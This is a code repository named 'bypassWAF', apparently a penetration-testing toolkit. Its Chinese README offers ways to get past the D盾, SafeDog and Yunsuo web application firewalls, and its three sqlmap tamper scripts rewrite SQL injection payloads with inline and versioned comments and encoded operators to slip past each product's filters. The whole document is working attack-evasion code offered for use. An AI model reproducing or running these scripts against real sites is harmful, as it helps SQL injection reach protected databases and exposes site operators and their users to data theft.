├── README.md ├── bypass_D盾.py ├── bypass_dog.py └── bypass_云锁.py /README.md: -------------------------------------------------------------------------------- 1 | # bypassWAF 2 | 一些bypass D盾、安全狗、云锁的方法或脚本 3 | -------------------------------------------------------------------------------- /bypass_D盾.py: -------------------------------------------------------------------------------- 1 | # coding=UTF-8 2 | # Desc: sqlmap_bypass_D盾_tamper 3 | 4 | from lib.core.enums import PRIORITY 5 | __priority__ = PRIORITY.LOW 6 | 7 | 8 | def dependencies(): 9 | pass 10 | 11 | 12 | def tamper(payload, **kwargs): 13 | """ 14 | BYPASS Ddun 15 | """ 16 | retVal = payload 17 | if payload: 18 | retVal = "" 19 | quote, doublequote, firstspace = False, False, False 20 | for i in xrange(len(payload)): 21 | if not firstspace: 22 | if payload[i].isspace(): 23 | firstspace = True 24 | retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" 25 | continue 26 | elif payload[i] == '\'': 27 | quote = not quote 28 | elif payload[i] == '"': 29 | doublequote = not doublequote 30 | elif payload[i] == " " and not doublequote and not quote: 31 | retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" 32 | continue 33 | retVal += payload[i] 34 | return retVal -------------------------------------------------------------------------------- /bypass_dog.py: -------------------------------------------------------------------------------- 1 | # coding=UTF-8 2 | 3 | from lib.core.enums import PRIORITY 4 | from lib.core.settings import UNICODE_ENCODING 5 | __priority__ = PRIORITY.LOW 6 | def dependencies(): 7 | pass 8 | def tamper(payload, **kwargs): 9 | 10 | if payload: 11 | payload=payload.replace(" ","/*!*/") 12 | payload=payload.replace("=","/*!*/=/*!*/") 13 | payload=payload.replace("AND","/*!*/AND/*!*/") 14 | payload=payload.replace("UNION","union/*!88888cas*/") 15 | payload=payload.replace("#","/*!*/#") 16 | payload=payload.replace("USER()","USER/*!()*/") 17 | payload=payload.replace("DATABASE()","DATABASE/*!()*/") 18 | payload=payload.replace("--","/*!*/--") 19 | payload=payload.replace("SELECT","/*!88888cas*/select") 20 | payload=payload.replace("FROM","/*!99999c*//*!99999c*/from") 21 | payload=payload.replace('SLEEP(','sleep/**/(') 22 | payload=payload.replace('super_priv','/*!29440/**/super_priv*/') 23 | payload=payload.replace('and host=','/*!29440and*/host/*!11440=*/') 24 | payload=payload.replace('LIKE USER()','like (user/**/())') 25 | payload=payload.replace('CURRENT_USER()','CURRENT_USER/**/()') 26 | payload=payload.replace('SESSION_USER()','SESSION_USER(%0a)') 27 | print payload 28 | 29 | return payload 30 | -------------------------------------------------------------------------------- /bypass_云锁.py: -------------------------------------------------------------------------------- 1 | # coding=UTF-8 2 | # Desc: sqlmap bypass 云锁 tamper 3 | """ 4 | Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | import re 9 | 10 | from lib.core.data import kb 11 | from lib.core.enums import PRIORITY 12 | from lib.core.common import singleTimeWarnMessage 13 | from lib.core.enums import DBMS 14 | __priority__ = PRIORITY.LOW 15 | 16 | 17 | def dependencies(): 18 | pass 19 | 20 | 21 | def tamper(payload, **kwargs): 22 | payload = payload.replace('ORDER', '/*!00000order*/') 23 | payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select') 24 | payload = payload.replace('CONCAT(', "CONCAT/**/(") 25 | payload = payload.replace("--", " */--") 26 | payload = payload.replace("AND", "%26%26") 27 | return payload --------------------------------------------------------------------------------